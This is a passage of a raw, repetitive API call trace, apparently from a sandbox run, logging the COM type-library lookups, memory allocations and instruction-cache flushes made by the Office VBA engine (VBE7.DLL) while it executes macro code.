ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203e60, pIndex=0x0 | out: ppTLib=0x203e60*=0x7edf740, pIndex=0x0) returned 0x0 [0046.971] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203e70, pDummy=0x0 | out: ppTLibAttr=0x203e70, pDummy=0x0) returned 0x0 [0046.971] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.971] IUnknown:Release (This=0x7edf740) returned 0xd [0046.971] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x203e60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.971] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203e60, pbstrName=0x0, pwOrdinal=0x203e80 | out: pBstrDllName=0x203e60*=0x0, pbstrName=0x0, pwOrdinal=0x203e80*=0x40f0) returned 0x0 [0046.971] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000) returned 0x0 [0046.971] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0046.971] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.971] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.971] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.971] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.971] GetCurrentProcess () returned 0xffffffffffffffff [0046.971] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x53) returned 1 [0046.971] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0046.971] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813c0b0 [0046.971] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.971] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.971] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203e60, pIndex=0x0 | out: ppTLib=0x203e60*=0x7edf740, pIndex=0x0) returned 0x0 [0046.971] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203e70, pDummy=0x0 | out: ppTLibAttr=0x203e70, pDummy=0x0) returned 0x0 [0046.971] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.971] IUnknown:Release (This=0x7edf740) returned 0xd [0046.971] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x203e60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.971] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203e60, pbstrName=0x0, pwOrdinal=0x203e80 | out: pBstrDllName=0x203e60*=0x0, pbstrName=0x0, pwOrdinal=0x203e80*=0x40f0) returned 0x0 [0046.971] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000) returned 0x0 [0046.971] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x817bfb0 [0046.971] _mbscpy_s (in: _Dst=0x817bfb0, _DstSizeInBytes=0x4, _Src=0x30d133a | out: _Dst=0x817bfb0) returned 0x0 [0046.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0046.971] IUnknown:AddRef (This=0x7edf740) returned 0xe [0046.972] IUnknown:Release (This=0x7edf740) returned 0xd [0046.972] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.972] IUnknown:Release (This=0x8128768) returned 0x4 [0046.972] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.972] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.972] IMalloc:Free (This=0x7feff045380, pv=0x817bfb0) [0046.972] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203e60, pIndex=0x0 | out: ppTLib=0x203e60*=0x7edf740, pIndex=0x0) returned 0x0 [0046.972] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203e70, pDummy=0x0 | out: ppTLibAttr=0x203e70, pDummy=0x0) returned 0x0 [0046.972] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.972] IUnknown:Release (This=0x7edf740) returned 0xd [0046.972] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x203e60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.972] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203e60, pbstrName=0x0, pwOrdinal=0x203e80 | out: pBstrDllName=0x203e60*=0x0, pbstrName=0x0, pwOrdinal=0x203e80*=0x40f0) returned 0x0 [0046.972] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000) returned 0x0 [0046.972] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.972] IUnknown:Release (This=0x8128768) returned 0x4 [0046.972] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.972] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.972] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203e60, pIndex=0x0 | out: ppTLib=0x203e60*=0x7edf740, pIndex=0x0) returned 0x0 [0046.972] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203e70, pDummy=0x0 | out: ppTLibAttr=0x203e70, pDummy=0x0) returned 0x0 [0046.972] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.972] IUnknown:Release (This=0x7edf740) returned 0xd [0046.972] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x203e60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.972] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203e60, pbstrName=0x0, pwOrdinal=0x203e80 | out: pBstrDllName=0x203e60*=0x0, pbstrName=0x0, pwOrdinal=0x203e80*=0x40f0) returned 0x0 [0046.972] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000) returned 0x0 [0046.972] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x817bfb0 [0046.972] _mbscpy_s (in: _Dst=0x817bfb0, _DstSizeInBytes=0x4, _Src=0x30d133a | out: _Dst=0x817bfb0) returned 0x0 [0046.972] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0046.972] IUnknown:AddRef (This=0x7edf740) returned 0xe [0046.973] IUnknown:Release (This=0x7edf740) returned 0xd [0046.973] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.973] IUnknown:Release (This=0x8128768) returned 0x4 [0046.973] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.973] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.973] IMalloc:Free (This=0x7feff045380, pv=0x817bfb0) [0046.973] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203e60, pIndex=0x0 | out: ppTLib=0x203e60*=0x7edf740, pIndex=0x0) returned 0x0 [0046.973] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203e70, pDummy=0x0 | out: ppTLibAttr=0x203e70, pDummy=0x0) returned 0x0 [0046.973] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.973] IUnknown:Release (This=0x7edf740) returned 0xd [0046.973] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x203e60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.973] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203e60, pbstrName=0x0, pwOrdinal=0x203e80 | out: pBstrDllName=0x203e60*=0x0, pbstrName=0x0, pwOrdinal=0x203e80*=0x40f0) returned 0x0 [0046.973] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000) returned 0x0 [0046.973] IUnknown:AddRef (This=0x8128768) returned 0x5 [0046.973] IUnknown:Release (This=0x8128768) returned 0x4 [0046.973] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204628 | out: ppvObject=0x204628*=0x0) returned 0x80004002 [0046.973] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204620 | out: ppvObject=0x204620*=0x0) returned 0x80004002 [0046.973] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203e60, pIndex=0x0 | out: ppTLib=0x203e60*=0x7edf740, pIndex=0x0) returned 0x0 [0046.973] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203e70, pDummy=0x0 | out: ppTLibAttr=0x203e70, pDummy=0x0) returned 0x0 [0046.973] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.973] IUnknown:Release (This=0x7edf740) returned 0xd [0046.973] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x203e60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.973] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203e60, pbstrName=0x0, pwOrdinal=0x203e80 | out: pBstrDllName=0x203e60*=0x0, pbstrName=0x0, pwOrdinal=0x203e80*=0x40f0) returned 0x0 [0046.973] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203e60, pwOrdinal=0x500000000) returned 0x0 [0046.974] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x203b38, pDummy=0x203c04 | out: ppTypeAttr=0x203b38, pDummy=0x203c04*=0x0) returned 0x0 [0046.974] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0046.974] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] GetCurrentProcess () returned 0xffffffffffffffff [0046.974] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x4c) returned 1 [0046.974] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0046.974] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203b40, pDummy=0x0 | out: ppTypeAttr=0x203b40, pDummy=0x0) returned 0x0 [0046.974] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0046.974] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] GetCurrentProcess () returned 0xffffffffffffffff [0046.974] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x4c) returned 1 [0046.974] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0046.974] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203d80, pDummy=0x0 | out: ppTypeAttr=0x203d80, pDummy=0x0) returned 0x0 [0046.974] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0046.974] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] GetCurrentProcess () returned 0xffffffffffffffff [0046.974] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x54) returned 1 [0046.974] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0046.974] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203fc0, pDummy=0x0 | out: ppTypeAttr=0x203fc0, pDummy=0x0) returned 0x0 [0046.974] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0046.974] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x814d240 [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] IMalloc:GetSize (This=0x7feff045380, pv=0x814d240) returned 0x26d [0046.974] GetCurrentProcess () returned 0xffffffffffffffff [0046.975] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x814d240, dwSize=0x4c) returned 1 [0046.975] IMalloc:Free (This=0x7feff045380, pv=0x814d240) [0046.975] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204200, pDummy=0x0 | out: ppTypeAttr=0x204200, pDummy=0x0) returned 0x0 [0046.975] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0046.975] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204280 | out: ppvObject=0x204280*=0x0) returned 0x80004002 [0046.975] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204288 | out: ppvObject=0x204288*=0x0) returned 0x80004002 [0046.975] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x204278 | out: ppvObject=0x204278*=0x7f7ab68) returned 0x0 [0046.975] ITypeInfo2:GetTypeKind (in: This=0x7f7ab68, pTypeKind=0x2042d4 | out: pTypeKind=0x2042d4*=3) returned 0x0 [0046.975] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0046.975] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204288 | out: ppvObject=0x204288*=0x0) returned 0x80004002 [0046.975] IUnknown:AddRef (This=0x7f7ab68) returned 0x7 [0046.975] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204280, pDummy=0x10 | out: ppTypeAttr=0x204280, pDummy=0x10) returned 0x0 [0046.975] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0046.975] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204278 | out: pRefType=0x204278*=0x3) returned 0x0 [0046.975] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204290 | out: ppTInfo=0x204290*=0x8137308) returned 0x0 [0046.975] IUnknown:Release (This=0x7f7ab68) returned 0x6 [0046.975] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204280, pDummy=0x204258 | out: ppTypeAttr=0x204280, pDummy=0x204258*=0x3) returned 0x0 [0046.975] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0046.975] IUnknown:Release (This=0x8137308) returned 0x1 [0046.975] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0046.975] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0046.975] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203d40, pIndex=0x0 | out: ppTLib=0x203d40*=0x7edf740, pIndex=0x0) returned 0x0 [0046.976] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203d50, pDummy=0x0 | out: ppTLibAttr=0x203d50, pDummy=0x0) returned 0x0 [0046.976] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.976] IUnknown:Release (This=0x7edf740) returned 0xd [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x203d40, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203d40, pbstrName=0x0, pwOrdinal=0x203d60 | out: pBstrDllName=0x203d40*=0x0, pbstrName=0x0, pwOrdinal=0x203d60*=0x3fd0) returned 0x0 [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203d40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203d40, pwOrdinal=0x500000000) returned 0x0 [0046.976] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x2040a0, pIndex=0x0 | out: ppTLib=0x2040a0*=0x7edf740, pIndex=0x0) returned 0x0 [0046.976] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x2040b0, pDummy=0x0 | out: ppTLibAttr=0x2040b0, pDummy=0x0) returned 0x0 [0046.976] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.976] IUnknown:Release (This=0x7edf740) returned 0xd [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x2040a0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x2040a0, pbstrName=0x0, pwOrdinal=0x2040c0 | out: pBstrDllName=0x2040a0*=0x0, pbstrName=0x0, pwOrdinal=0x2040c0*=0x4330) returned 0x0 [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x2040a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x2040a0, pwOrdinal=0x500000000) returned 0x0 [0046.976] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203d00, pIndex=0x0 | out: ppTLib=0x203d00*=0x7edf740, pIndex=0x0) returned 0x0 [0046.976] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203d10, pDummy=0x0 | out: ppTLibAttr=0x203d10, pDummy=0x0) returned 0x0 [0046.976] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.976] IUnknown:Release (This=0x7edf740) returned 0xd [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x203d00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203d00, pbstrName=0x0, pwOrdinal=0x203d20 | out: pBstrDllName=0x203d00*=0x0, pbstrName=0x0, pwOrdinal=0x203d20*=0x3f90) returned 0x0 [0046.976] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203d00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203d00, pwOrdinal=0x500000000) returned 0x0 [0046.976] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x204060, pIndex=0x0 | out: ppTLib=0x204060*=0x7edf740, pIndex=0x0) returned 0x0 [0046.977] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204070, pDummy=0x0 | out: ppTLibAttr=0x204070, pDummy=0x0) returned 0x0 [0046.977] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.977] IUnknown:Release (This=0x7edf740) returned 0xd [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x204060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.977] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, 